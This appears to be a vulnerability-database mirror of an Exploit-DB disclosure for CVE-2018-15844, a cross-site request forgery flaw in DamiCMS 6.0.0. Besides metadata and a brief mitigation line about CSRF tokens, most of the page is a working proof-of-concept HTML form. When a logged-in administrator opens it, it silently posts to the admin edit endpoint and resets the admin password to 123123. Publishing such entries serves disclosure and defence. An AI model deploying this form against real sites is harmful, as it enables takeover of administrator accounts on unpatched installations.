DamiCMS 6.0.0 - Cross-Site Request Forgery (Change Admin Password)

vendor:

DamiCMS

by:

Autism_JH

8.8

CVSS

HIGH

Cross-Site Request Forgery

352

CWE

Product Name: DamiCMS

Affected Version From: 6.0.0

Affected Version To: 6.0.0

Patch Exists: NO

Related CWE: CVE-2018-15844

CPE: a:damicms:damicms:6.0.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2018

DamiCMS 6.0.0 – Cross-Site Request Forgery (Change Admin Password)

DamiCMS v6.0.0 allows CSRF to change the administrator account's password. After the administrator login in, open the poc, the administrator account's password will been changed to 123123.

Mitigation:

Implementing a CSRF token in the application can help mitigate this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: DamiCMS 6.0.0 - Cross-Site Request Forgery (Change Admin Password)
# Author: Autism_JH
# Date: 2018-08-30
# Vendor Homepage: https://github.com/731276192/damicms
# Software Link: https://github.com/731276192/damicms
# Version: 6.0.0
# CVE: CVE-2018-15844

# Description:
# DamiCMS v6.0.0 allows CSRF to change the administrator account's pssword.
# After the administrator login in,open the poc,the administrator account's 
# password will been changed to 123123

# POC:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
	<body>
		<script>history.pushState('', '', '/')</script>
		<form action="http://Target/dami/admin.php?s=/Admin/doedit" method="POST">
			<input type="hidden" name="username" value="admin" />
			<input type="hidden" name="password" value="123123" />
			<input type="hidden" name="role&#95;id" value="1" />
			<input type="hidden" name="id" value="1" />
			<input type="hidden" name="Submit" value="ç&#161;&#174;å&#174;&#154;ä&#191;&#174;æ&#148;&#185;" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>